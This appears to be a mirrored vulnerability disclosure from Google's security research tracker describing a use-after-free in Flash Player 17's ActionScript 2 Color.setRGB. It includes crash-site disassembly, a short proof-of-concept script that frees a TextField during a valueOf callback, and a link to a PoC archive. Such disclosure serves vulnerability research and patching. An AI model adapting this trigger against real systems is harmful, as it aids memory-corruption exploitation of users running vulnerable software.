50 lines
No EOL
2 KiB
Text
50 lines
No EOL
2 KiB
Text
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
|
|
|
|
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
|
|
|
|
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
|
|
|
|
---
|
|
VULNERABILITY DETAILS
|
|
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
|
|
|
|
VERSION
|
|
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
|
|
Operating System: Win7 x64 SP1
|
|
|
|
REPRODUCTION CASE
|
|
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
|
|
(These lines come from flashplayer17_sa.exe 17.0.0.169):
|
|
|
|
.text:004B82D0 push esi
|
|
.text:004B82D1 mov esi, [esp+4+arg_0]
|
|
.text:004B82D5 push edi
|
|
.text:004B82D6 mov edi, ecx
|
|
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
|
|
.text:004B82DE and ecx, 0FFFFFFFEh
|
|
.text:004B82E1 add ecx, 3Ch
|
|
.text:004B82E4 mov eax, esi
|
|
.text:004B82E6 call sub_4B0724 ; crash below
|
|
...
|
|
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
|
|
.text:004B0726 cmp edx, [eax]
|
|
.text:004B0728 jnz short loc_4B077E
|
|
|
|
|
|
Compile the poc with Flash CS5.5
|
|
***************************************************************************
|
|
Content of as2_color_uaf.fla:
|
|
|
|
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
|
|
var o = new Object()
|
|
o.valueOf = function () {
|
|
tf.removeTextField()
|
|
return 0x41414142
|
|
}
|
|
|
|
var c = new Color(tf)
|
|
c.setRGB(o)
|
|
---
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip |